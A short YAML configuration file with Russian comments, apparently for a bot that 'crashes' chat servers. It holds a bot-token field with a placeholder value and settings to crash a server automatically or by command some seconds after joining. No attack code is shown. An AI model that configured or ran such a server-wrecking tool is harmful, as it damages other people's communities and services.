# введите сюда токен вашего бота, про получение читайте (еще не готово)
token: "7383Hjdjue8282.dwj2o3uue8Jeiiwiwj283838.wnwi3u"
# автоматически крашить сервер после присоединения, или командой? Да = true, нет = false
auto-crash: false
# через какое время после присоединения начать краш сервера? В секундах
auto-crash-delay: 12.6
